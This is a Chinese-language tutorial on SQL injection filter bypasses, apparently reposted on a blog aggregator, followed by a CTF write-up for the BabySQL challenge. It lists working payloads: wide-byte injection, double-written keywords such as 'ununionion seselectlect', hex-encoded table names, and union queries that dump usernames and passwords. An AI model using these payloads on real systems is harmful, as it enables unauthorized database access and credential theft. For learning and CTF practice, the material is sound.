SQL注入繞過技巧

空格繞過

注釋符/* */，%a0，%0a

括號繞過空格

select(user())from dual where(1=1)and(2=2)

引號繞過

采用16進制編碼繞過，例如：

select column_name from information_schema.columns where table_name='users'

選中users，將其改為16進制編碼

select column_name from information_schema.tables where table_name=0x7573657273

繞過注釋符:#、-- -

通過閉合后面的引號來進行繞過

• id=1' union select 1,2,3||'1
• id=1' union select 1,2,'3
• Id=1’ where ‘1’=‘1
• Id=1’ and ‘1’=‘1
• Id=1’ or ‘1’=‘1

寬字節注入：

大家都知道PHP在開啟magic_quotes_gpc或者使用addslashes、iconv等函數的時候，單引號（'）會被轉義成\'。比如字 符%bf在滿足上述條件的情況下會變成%bf\'。其中反斜杠（\）的十六進制編碼是%5C，單引號（'）的十六進制編碼是%27，那么就可以得出%bf \'=%bf%5c%27。如果程序的默認字符集是GBK等寬字節字符集，則MySQL會認為%bf%5c是一個寬字符，也就是“縗”。也就是說%bf \'=%bf%5c%27=縗'。

?id=1%df'

代替and,or,not等等

利用符號替換 not=!、and=&&、or=||、xnot=|

在敏感詞中添加注釋：an/**/d?

雙寫繞過：oorr

大小寫變形：AnD

編碼

繞過union，select，where等：

• uniounionn：雙寫繞過 union、select、where等.
• U/**/ NION /**/ SE/**/ LECT /**/user，pwd from user
• UniOn：大小寫繞過

例題：[極客大挑戰 2019]BabySQL1

首先輸入萬能密碼進行嘗試:' or '1'='1-- -，發現回顯是錯誤用戶名和密碼，說明沒有注入成功，然后輸入在用戶名處輸入1'發現報錯。

根據報錯信息推斷出閉合的條件就是單引號'，所以繼續在用戶名處輸入1'-- -，密碼：1（一下密碼不做特殊聲明外均為1）進一步驗證判斷是否正確。

發現成功注入，說明閉合條件判斷正確，同時能夠確認幾點信息:

該題目沒有過濾單引號

該題目沒有過濾空格

該題目沒有過濾注釋符

確認幾點信息之后繼續輸入語句進行判斷數據庫的列數，方便進一步注入。

?username=admin' order by 1,2,3,4 -- -&password=1

發現報錯的回顯為：You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'der 1,2,3,4 -- -' and password='1'' at line 1

這里說明輸入的order by語句被過濾了or，導致最后語句只輸入了der 1,2,3,4，所以首先嘗試雙寫or，即寫為oorrder進行嘗試，看看能否成功。

?username=admin' oorrder by 1,2,3,4 -- -&password=1

輸入之后發現order的問題沒有繼續報錯，但是by被屏蔽了，所以同樣的處理雙寫by為bbyy，最終的語句為：

?username=admin' oorrder bbyy 1,2,3,4 -- -&password=1

?輸入語句之后發現回顯為:Unknown column '4' in 'order clause'。說明一共只有三列。這時候輸入union select語句去判斷顯示位

?username=admin' and 1=2 union selcet 1,2,3 -- -&password=1

發現報錯的回顯為：You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1=2 selcet 1,2,3 -- -' and password='1'' at line 1。說明union被過濾了，所以同樣的辦法，雙寫union為ununionion繼續嘗試。發現仍然報錯，這時候繼續雙寫select為seselectlect嘗試。發現成功。

?username=-1' ununionion seselectlect 1,2,3 -- -&password=1

?找出顯示位以后繼續輸入如下語句，依次爆出數據庫，表名以及列名。

?username=-1' ununionion seselectlect 1,2,database()-- -&password=1?username=-1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() -- -&password=1?username=-1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' -- -&password=1

?列名如下：

?發現還沒有找到flag值，所以繼續爆id，username，password看看flag是否隱藏在數據之中。

?username=-1' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frfromom b4bsql -- -&password=1

?發現flag值隱藏在password之中，其值為：flag{7186e94f-091e-4e44-8736-c93c5534aa64}

總結

以上是生活随笔為你收集整理的SQL注入绕过（passby）策略的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。